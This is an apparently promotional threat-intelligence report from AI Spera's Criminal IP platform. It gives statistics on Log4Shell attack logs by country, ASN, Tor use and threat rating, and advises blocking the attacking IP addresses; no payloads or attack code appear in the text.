‘Criminal IP’, a cyber threat intelligence platform of AI Spera

AI Spera, a cyber threat intelligence company, has revealed detection and analysis data about 8,900 attack logs on Log4j (Log4Shell) vulnerabilities (CVE-2021-44228) through its own threat intelligence platform ‘Criminal IP’.

Since domestic and foreign security industries have yet to respond perfectly to Log4j vulnerabilities, it is expected that the attempted attack IP address database provided by AI Spera in conjunction with official patches will prove useful for corporate, institutional, and national security countermeasures. In particular, our disclosed data includes national statistics, ASN statistics, attack log analysis, and threat ratings of IP addresses that attempted such attacks. This warrants potential hacking defense by blocking IP addresses that capitalize on Log4j vulnerabilities.

AI Spera updates the attack IP address data collected by Criminal IP on a daily basis and provides it free of charge to security personnel who are still dealing with the log4j issue. If you contact , we will deliver the latest updated data on the attack IP addresses, enabling institutions and companies to secure the necessary information to address the Log4j attack.

The following is an analysis of data collected in AI Spera’s IP intelligence system, Criminal IP, for IP addresses involved in Log4j attacks over five days starting from December 14th (specifically, the 14th, 18th, 20th, 21st, and 22nd).

■ Log4j Vulnerability Attack Statistics

As indicated in the table below, the number of attack logs increased by approximately 2.45 times, from 963 cases on the 14th to 2,357 cases on the 18th. This highlights the growing prevalence of attack methods and the increasing search for potential targets. However, when considering unique IP addresses after removing duplicates, it was observed that the number decreased threefold, from 245 cases on the 14th to 65 cases on the 18th, with an average of around 50-60 unique cases.

Although a total of 381 unique IP addresses have been detected, 107 of them were shown to attempt continuous attacks. These recurring IP addresses can be viewed as originating from servers running automated attack scripts. Accordingly, it is highly recommended for companies using Log4j-related services block these suspicious IP addresses in advance.

Log4j Vulnerability Attack Log Statistics collected through Criminal IP

■ Country statistics

Out of 381 cases, 39 unique countries were identified in the statistics. The top three countries were the United States, Germany, and China, comprising a significant portion. The top five countries accounted for 84% of the cases. China, known for being a source of dangerous IP addresses, was included in the rankings. The United States, commonly associated with originating attack scanning IPs, also had a notable presence.

Log4j Vulnerability Attack Log Statistics collected through Criminal IP

■ Tor IP

It was also observed that some of the attack IP address data included Tor IP addresses. Besides its use as a browser, Tor, well-known for its association with the dark web, supports scripting and APIs in languages such as Python, C#, and Go. Hackers often embed Tor into their code to conduct scanning and carry out attacks. Among the IP addresses involved in these Log4j attacks, instances utilizing Tor IP addresses were identified. As Tor IP addresses are frequently used for malicious activities, it is recommended to proactively block inbound IP addresses in the form of Tor IP addresses.

Log4j Vulnerability Attack Log Statistics collected through Criminal IP

■ Hackers are not the only ones attacking

The following statistics provide information on ASN Name and Org Name, which are the owners of IP addresses. When examining the ASN Name in the United States, which has the highest number of attack IP addresses, it is observed that most of them belong to hosting or ISP companies that offer cloud servers or hosting services for scanning and conducting cyber attacks. Particularly, DigitalOcean servers stand out, indicating that there were previously frequent hacking attempts on cloud servers such as AWS. However, in recent years, there has been a significant decrease in such attempts, with other hosting server names taking their place.

In addition to hosting companies, there were instances of attacks originating from the Massachusetts Institute of Technology (MIT). These attacks could have been conducted by students living in dormitories out of curiosity, or they might have been carried out for laboratory research purposes. When examining the ASN name and Org name of the attacker’s IP address, the latter cases seem more plausible. The Org name revealed two IP addresses associated with the Computer Science and Artificial Intelligence University laboratory and MIT’s Vice President for Information Systems and Technology, Mark Silis. Furthermore, an IP address belonging to a security testing company called ESecurity was also identified. This indicates that not all attacker IP addresses can be attributed to malicious hackers, as scanning activities are observed in various cybersecurity research institutions.

Classification based on AS Name and Org Name of Log4j Attack IP Addresses

■ Diversification of attack packets

Upon close examination of attack packets, various patterns were identified. The initial attack style typically involves entering a specific value into the User-agent, which is essentially a one-dimensional scanning method. Due to its simplicity, patterns or signatures to detect these attacks are quickly distributed, allowing for their immediate blocking. Consequently, an increasing number of hackers are resorting to alternative methods to circumvent these known detection techniques.

The structure of the packet, commonly employed in bypass methods, is as follows. It can be of great assistance in creating IDS/IPS signatures.

■ Confirmation in IP Intelligence

Finally, Criminal IP classifies threat levels for all IP addresses worldwide using a 5-step scoring system (Safe, Low, Moderate, Dangerous, Critical). Upon analyzing the threat ratings of IP addresses collected from Log4j attack incidents, it was determined that 87.1% of the IP addresses were classified as Dangerous/Critical. This suggests that approximately 87.1% of the IP addresses involved in Log4j attacks have a history of targeting other organizations or are persistently used for malicious activities. By utilizing the Criminal IP intelligence system to receive information on dangerous IP addresses and proactively block incoming IP addresses, organizations can greatly mitigate the impact of Log4j attacks.

Classification of Log4j attack IP addresses based on 5-step threat ratings by Criminal IP

“If you proactively obtain and block the attack IP address, you can mitigate the scanning attack by hackers.”

As log4j attacks gain more public attention, it is observed that the attackers and their methods are becoming increasingly diverse. In particular, hackers are creating and sending newly crafted attack packets to evade detection by IDS/IPS signatures. Therefore, by obtaining and blocking the attack IP addresses in advance, the scanning attacks conducted by hackers can be effectively mitigated. Additionally, considering that Tor IP addresses are also used to bypass attacks, blocking Tor IP addresses can aid in timely response to such attacks.

In addition, by integrating IP address blocking with an IP intelligence system, you can avoid the need to constantly collect new IP addresses and enable automatic responses whenever a hacker changes IP addresses and performs scans. Initially, IDS/IPS signatures were used to cope with the continuously changing IP addresses. However, with the attack packets frequently transforming themselves, there has been a shift to the traditional method of blocking IP addresses. This process involves the IP intelligence system obtaining and registering candidate IP addresses in advance that are likely to engage in cyber attacks.

In other reported cases, attacks were initiated for testing or security check purposes solely based on the ASN Name or Org Name. In such cases, blocking the IP address may not be necessary. However, if there is a concern that even a simulated attack could potentially compromise a company’s internal assets, an alternative option is to contact the scanning agency and request the removal of the IP address from their scanning process.

In addition, if the IP intelligence system detects an ASN Name or Org Name that is sending attack packets to non-cybersecurity-related entities such as manufacturing companies or medical facilities instead of cloud servers or hosting servers, it is highly likely that the scanning activity is not for research purposes but being utilized by hackers after infiltrating the company’s server. Therefore, it is advisable for national investigative and law enforcement agencies to regularly monitor and investigate potential cyberattacks that may be evading their attention.

This report is based on data from Criminal IP, a Cyber Threat Intelligence search engine. Create a free Criminal IP account today to access the search results cited in the report and search for more extensive threat Intelligence. [Criminal IP’s Official Service Release]